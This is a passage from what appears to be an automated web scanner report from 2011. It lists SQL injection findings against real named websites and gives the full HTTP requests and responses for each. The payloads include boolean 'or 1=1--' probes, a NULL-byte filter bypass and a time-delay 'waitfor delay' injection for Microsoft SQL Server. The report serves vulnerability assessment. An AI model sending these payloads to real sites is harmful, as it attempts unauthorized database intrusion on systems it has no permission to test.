GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:39:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 835

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 822

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

1.3. http://afreshbunch.com/ [ASPSESSIONIDSSTDDTRS cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://afreshbunch.com
Path:   /

Issue detail

The ASPSESSIONIDSSTDDTRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASPSESSIONIDSSTDDTRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB%00'; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.14.10.1303778640

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:19:50 GMT
Connection: close
Content-Length: 60

<html><body><h1> HTTP/1.1 Server Too Busy</h1></body></html>

Request 2

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB%00''; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.14.10.1303778640

Response 2 (redirected)

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 124
Content-Type: text/html
Location: ../
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:20:24 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

1.4. http://afreshbunch.com/files/com/call.asp [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the site_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756%00'&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypass&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response 1

HTTP/1.1 302 Object moved
Location: /system/500error.asp?500;http://afreshbunch.com/files/com/call.asp
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:16:47 GMT
Connection: close
Content-Length: 0

Request 2

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756%00''&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypass&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 306
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:17:21 GMT


//document.write("<textarea>/forums/default.asp?page=*)(sn=*)(sn=*&sa=mine</textarea>")
//document.write("<br><textarea>/forums/default.asp?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1
...[SNIP]...

1.5. http://afreshbunch.com/user/453756/theme/design/AFB2011/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /user/453756/theme/design/AFB2011/style.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3. The application took 99838 milliseconds to respond to the request, compared with 1055 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /user/453756/theme',0,0,0)waitfor%20delay'0%3a0%3a20'--/design/AFB2011/style.css?2011425200341 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB

Response (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:14:06 GMT
Connection: close
Content-Length: 60

<html><body><h1> HTTP/1.1 Server Too Busy</h1></body></html>

1.6. https://store.tenable.com/ [cPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /

Issue detail

The cPath parameter appears to be vulnerable to SQL injection attacks. The payloads 90230064%20or%201%3d1--%20 and 90230064%20or%201%3d2--%20 were each submitted in the cPath parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?main_page=index&cPath=190230064%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:52:35 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Request 2

GET /?main_page=index&cPath=190230064%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:52:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26937

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping " />
<meta name="description" content="Tenable Store - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />
<meta name="robots" content="noindex, nofollow" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl'
...[SNIP]...

1.7. https://store.tenable.com/ [main_page parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /

Issue detail

The main_page parameter appears to be vulnerable to SQL injection attacks. The payloads 23679891'%20or%201%3d1--%20 and 23679891'%20or%201%3d2--%20 were each submitted in the main_page parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?main_page=index23679891'%20or%201%3d1--%20&cPath=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:51:54 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Request 2

GET /?main_page=index23679891'%20or%201%3d2--%20&cPath=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:51:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 21734

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Page Not Found : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping Page Not Found" />
<meta name="description" content="Tenable Store : Page Not Found - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ss
...[SNIP]...

1.8. https://store.tenable.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 94659222%20or%201%3d1--%20 and 94659222%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?main_page=index&cPath=1&194659222%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:55:18 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Request 2

GET /?main_page=index&cPath=1&194659222%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26479

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>ProfessionalFeed : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping ProfessionalFeed" />
<meta name="description" content="Tenable Store : ProfessionalFeed - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl
